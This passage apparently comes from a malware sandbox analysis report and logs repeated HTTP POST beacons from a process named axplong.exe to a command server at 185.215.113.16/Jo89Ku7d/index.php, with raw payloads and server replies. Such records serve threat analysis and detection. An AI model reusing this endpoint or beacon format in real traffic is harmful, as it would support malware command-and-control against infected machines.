                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:26.409729958 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:26 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    45192.168.2.749750185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:26.526302099 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:27.286066055 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:27 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:27.286993980 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:27.545217037 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:27 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    46192.168.2.749751185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:27.668454885 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:28.458842039 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:28 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:28.459644079 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:28.716157913 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:28 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    47192.168.2.749752185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:28.871984005 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:29.679578066 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:29 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:29.680432081 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:29.950840950 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:29 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    48192.168.2.749753185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:30.071485043 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:30.866576910 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:30 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:30.884241104 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:31.135767937 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    49192.168.2.749754185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:31.266705990 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:32.044661045 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:03:32.047498941 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:32.297688007 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:32 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    50192.168.2.749755185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:32.419059992 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:33.187058926 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:33 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    51192.168.2.749756185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:33.195482969 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:33.945867062 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:33 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    52192.168.2.749757185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:34.059295893 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:34.832664967 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:34 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    53192.168.2.749759185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:34.981722116 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:35.764174938 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:35 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    54192.168.2.749760185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:35.772686958 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:36.533183098 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    55192.168.2.749761185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:36.655889034 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:37.459311962 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:37 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    56192.168.2.749762185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:37.477670908 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:38.271383047 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    57192.168.2.749763185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:38.499526978 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:39.239917994 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    58192.168.2.749764185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:39.267868996 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:40.762068033 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0
                    Jul 26, 2024 21:03:40.762662888 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0
                    Jul 26, 2024 21:03:40.763165951 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    59192.168.2.749765185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:40.890784025 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:41.672030926 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    60192.168.2.749766185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:42.085217953 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:03:42.810873032 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:03:42 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    61192.168.2.749767185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:03:42.934361935 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:03:43.746501923 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
